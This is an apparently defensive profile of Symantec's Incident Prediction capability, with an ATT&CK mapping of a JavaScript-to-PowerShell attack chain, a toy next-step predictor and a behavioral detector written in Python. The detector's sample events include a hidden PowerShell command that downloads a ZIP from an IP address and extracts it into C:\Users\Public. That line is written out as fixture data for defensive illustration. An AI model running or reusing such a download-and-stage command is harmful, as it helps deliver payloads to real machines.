Source headline: "Introducing Incident Prediction, an industry-first capability that can accurately predict an attacker's next four or five moves with up to 100% confidence"
# Tool/Technique: Incident Prediction (via Symantec Endpoint Security Complete)
## Overview
Incident Prediction is a security capability integrated into Broadcom's Symantec Endpoint Security Complete (leveraging Adaptive Protection technology). Its purpose is to use Artificial Intelligence (AI) and Machine Learning (ML) to predict the attacker's next actions in an active cyber incident chain, allowing security teams to disrupt these future steps granularly without causing complete system or network shutdowns.
## Technical Details
- Type: Tool / Security Capability
- Platform: Endpoint, with cloud analytics (implied by the Symantec Endpoint Security Complete architecture; the source does not state where the prediction model runs)
- Capabilities: Predictive threat analysis, granular mitigation enforcement, automated incident reversion.
- First Seen: Announced in the source article as an extension of the existing Adaptive Protection technology.
## MITRE ATT&CK Mapping
Incident Prediction is a defensive capability that counters established TTPs, so the mapping below lists the *adversary behaviors* it aims to disrupt, particularly living-off-the-land (LOTL) attacks, in which the attacker runs legitimate tools already present on the host rather than dropping malware.
- **TA0001 - Initial Access**
  - Not described in the source. The example chain starts with a user running a downloaded JS file, so the delivery vector (e.g., T1189 - Drive-by Compromise or T1566.001 - Spearphishing Attachment) is unknown.
- **TA0002 - Execution** (the observed start of the example chain)
  - T1204.002 - User Execution: Malicious File
  - T1059.007 - Command and Scripting Interpreter: JavaScript (run via wscript.exe)
  - T1059.001 - Command and Scripting Interpreter: PowerShell
- **TA0003 - Persistence**
  - Relevant if the prediction targets an established foothold; the source names no specific technique.
- **TA0005 - Defense Evasion**
  - T1218 - System Binary Proxy Execution (formerly "Signed Binary Proxy Execution"; common in LOTL)
- **TA0006 - Credential Access**
  - T1003 - OS Credential Dumping (the credential-theft step mentioned in the example)
- **TA0008 - Lateral Movement**
  - Predicting steps to move across the network; the source names no specific technique.
- **TA0011 - Command and Control**
  - T1105 - Ingress Tool Transfer (the ZIP fetched over HTTP by PowerShell)
  - Subsequent C2 activity after initial execution.
## Functionality
### Core Capabilities
- **Prediction:** Uses a catalog of over 500,000 documented attack chains to predict the next four or five moves an attacker will take, each with a confidence score. The vendor's "up to 100%" figure is a model-reported probability, not a guarantee; treat it as a prioritization signal rather than proof that the step will occur.
- **Disruption:** Allows security analysts to mitigate and block *predicted* malicious actions via the Adaptive Protection policy, stopping the attack chain before it executes the predicted step.
- **Granular Control:** Stops only the predicted malicious behaviors, avoiding costly, full system or network shutdowns often induced by traditional ransomware response.
### Advanced Features
- **AI/ML-Driven:** Uses ML models that the vendor describes as inspired by generative AI large language models, applied to sequences of attacker actions instead of text.
- **Reversion:** Automatically creates a revert task, enabling analysts to easily undo mitigation steps post-investigation.
- **LOTL Disruption:** Specifically designed and trained to identify and disrupt Living Off the Land (LOTL) techniques, where little or no malware is deployed and the attacker relies on legitimate, already-installed tools.
- **Confidence Scoring:** Provides predicted next steps along with an associated probability percentage (0-100%).
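The prediction and confidence-scoring idea described above, reduced to its simplest form as an added illustration (this is not Symantec's code, and nothing is known about the real model): chains in a catalog that begin with the observed behaviors vote on what comes next, and the confidence for each predicted step is the share of voting chains that agree. The catalog, the technique IDs used as step names and the `steps_to_block` thresholds are all constructed assumptions.

```python
"""Prefix-matching predictor over a catalog of attack chains.

Added illustration, not Symantec's code. The catalog below is constructed
and tiny; the product reportedly draws on more than 500,000 documented chains.
"""
from collections import Counter

# Constructed catalog (hypothetical). Each chain is an ordered list of
# attacker behaviors written as ATT&CK technique IDs.
CATALOG = [
    ["T1204.002", "T1059.007", "T1059.001", "T1105", "T1003", "T1021.002", "T1486"],
    ["T1204.002", "T1059.007", "T1059.001", "T1105", "T1003", "T1021.002", "T1486"],
    ["T1204.002", "T1059.007", "T1059.001", "T1105", "T1547.001", "T1071.001"],
    ["T1204.002", "T1059.005", "T1059.001", "T1105", "T1003", "T1486"],
    ["T1189", "T1059.001", "T1105", "T1071.001", "T1003", "T1021.002"],
]


def predict_next_steps(observed, catalog=CATALOG, horizon=4):
    """Predict the next `horizon` steps after the `observed` sequence.

    Returns a list of (technique, probability, support) tuples. Chains that
    start with `observed` vote on each following position; the probability is
    the share of still-consistent chains that agree on the winning step, and
    `support` is how many chains were voting. Prediction follows the most
    likely path, so each position conditions on the steps predicted before it.
    """
    n = len(observed)
    continuations = [c[n:] for c in catalog if c[:n] == observed]
    predictions = []
    path = []
    for pos in range(horizon):
        voters = [c for c in continuations if len(c) > pos and c[:pos] == path]
        if not voters:
            break  # no documented chain reaches this far
        votes = Counter(c[pos] for c in voters)
        step, count = votes.most_common(1)[0]
        predictions.append((step, count / len(voters), len(voters)))
        path.append(step)
    return predictions


def steps_to_block(predictions, min_probability=0.9, min_support=2):
    """Pick the predicted steps worth a granular block (thresholds are assumed).

    A 100% figure backed by a single matching chain is weaker evidence than
    90% backed by fifty, so both the probability and the support are checked.
    The returned list doubles as the revert task: undoing the mitigation means
    removing exactly these entries.
    """
    return [step for step, p, support in predictions
            if p >= min_probability and support >= min_support]


if __name__ == "__main__":
    seen = ["T1204.002", "T1059.007", "T1059.001"]  # JS lure -> wscript -> PowerShell
    for step, p, support in predict_next_steps(seen):
        print(f"{step:10s} {p:5.0%}  ({support} chains)")
    print("block:", steps_to_block(predict_next_steps(seen)))
```

Running it on the three observed steps of the JS-to-PowerShell chain yields T1105 at 100% (three chains), T1003 at 67%, then T1021.002 and T1486 at 100% but on only two chains. The single-chain `T1189` prefix produces four predictions that are all "100%" with a support of one, which is exactly the case where a confidence percentage alone would mislead an analyst.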
## Indicators of Compromise
*Note: As this describes a defensive tool, no direct IoCs are provided, but the system detects the IoCs generated by the attack.*
- File Hashes: N/A (detection is behavioral, not hash-based)
- File Names: no specific names given; the example involves a .js file run by wscript.exe, a .zip archive fetched by PowerShell, and .vbs files
- Registry Keys: N/A
- Network Indicators: an outbound HTTP download during the execution phase (no domain or IP is given in the source)
- Behavioral Indicators: download and execution of a JS file; wscript.exe executing JS content that launches PowerShell; PowerShell downloading a ZIP over HTTP and extracting it to C:\Users\Public\
## Associated Threat Actors
- Ransomware Groups
- Nation-State Attackers
- Attackers utilizing predictable Tactics, Techniques, and Procedures (TTPs).
## Detection Methods
- **Behavioral Detection:** Based on advanced analytics trained on attack chains to detect deviations characteristic of ongoing malicious activity, even when using legitimate software (LOTL).
- **AI/ML Analysis:** Identifying sequences of actions that strongly correlate with known attack patterns within the vast attack catalog.
- **Confidence Thresholding:** An observed behavior that matches a known chain raises the alert; the predicted next steps are attached to it with their probabilities, and those above a high-confidence percentage are surfaced for preventive blocking.
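What behavioral detection of the example chain looks like in practice, as an added illustration over constructed process-creation events (not Symantec's code, and not the product's detection logic): powershell.exe whose parent is wscript.exe running a .js file, with a command line that fetches a .zip over HTTP into C:\Users\Public. The events, host paths, user name and IP address are made up, shaped loosely like Sysmon Event ID 1 records; the ATT&CK IDs attached to each finding are the ones a predictor would take as its observed prefix.

```python
"""Detection of the JS -> wscript.exe -> PowerShell -> HTTP ZIP download chain.

Added illustration, not Symantec's code. Runs over constructed events only.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    ts: int
    pid: int
    ppid: int
    image: str
    cmdline: str


def _name(image):
    """Lower-cased file name of an image path (Windows separators)."""
    return image.rsplit("\\", 1)[-1].lower()


# Constructed sample telemetry (hypothetical host, user, IP and file names).
EVENTS = [
    ProcessEvent(1, 100, 50, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcessEvent(2, 300, 100, r"C:\Windows\System32\wscript.exe",
                 r'wscript.exe "C:\Users\alice\AppData\Local\Temp\invoice.js"'),
    ProcessEvent(3, 400, 300,
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell.exe -nop -w hidden -c "Invoke-WebRequest http://198.51.100.7/p.zip '
                 r'-OutFile C:\Users\Public\p.zip; Expand-Archive C:\Users\Public\p.zip C:\Users\Public"'),
    ProcessEvent(4, 500, 100, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    # Benign PowerShell started from the shell: no script-host parent, so no hit.
    ProcessEvent(5, 600, 100,
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe Get-Process"),
]

URL_RE = re.compile(r"https?://[\w.:/-]+", re.I)
PUBLIC_RE = re.compile(r"c:\\users\\public\\", re.I)
EXTRACT_RE = re.compile(r"expand-archive|extracttodirectory", re.I)


def detect_js_to_powershell_download(events):
    """Flag powershell.exe spawned by wscript.exe running a .js file, where the
    PowerShell command line fetches a .zip over HTTP into C:\\Users\\Public.

    Each finding carries the ATT&CK steps already observed, in order.
    """
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if _name(e.image) != "powershell.exe":
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or _name(parent.image) != "wscript.exe":
            continue
        if not re.search(r"\.js\b", parent.cmdline, re.I):
            continue
        url = URL_RE.search(e.cmdline)
        if not url or not url.group(0).lower().endswith(".zip"):
            continue
        if not PUBLIC_RE.search(e.cmdline):
            continue
        findings.append({
            "parent_pid": parent.pid,
            "pid": e.pid,
            "url": url.group(0),
            "extracts": bool(EXTRACT_RE.search(e.cmdline)),
            "techniques": ["T1059.007", "T1059.001", "T1105"],
        })
    return findings


if __name__ == "__main__":
    for finding in detect_js_to_powershell_download(EVENTS):
        print(finding)
```

Every binary in the chain is a legitimate Windows component, so the rule keys on the parent-child relationship and the command-line content rather than on any file hash; that is the point of the LOTL emphasis in the text. Dropping the wscript.exe event from the sample leaves the PowerShell download unattributed and the detector returns nothing, which is why process-lineage telemetry matters for this kind of rule.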
## Mitigation Strategies
- **Preventative Disruption:** Applying granular blocks via the Adaptive Protection policy to predicted malicious behaviors before they occur.
- **Operational Continuity:** Maintaining business operations by avoiding mandatory network shutdowns.
- **Post-Incident Reversion:** Using the created revert task to undo mitigations if necessary after further investigation.
## Related Tools/Techniques
- Broadcom Adaptive Protection technology (Extended by Incident Prediction)
- Living Off the Land (LOTL) Techniques (The primary attack methodology being countered)
- AI/ML-based Threat Hunting Platforms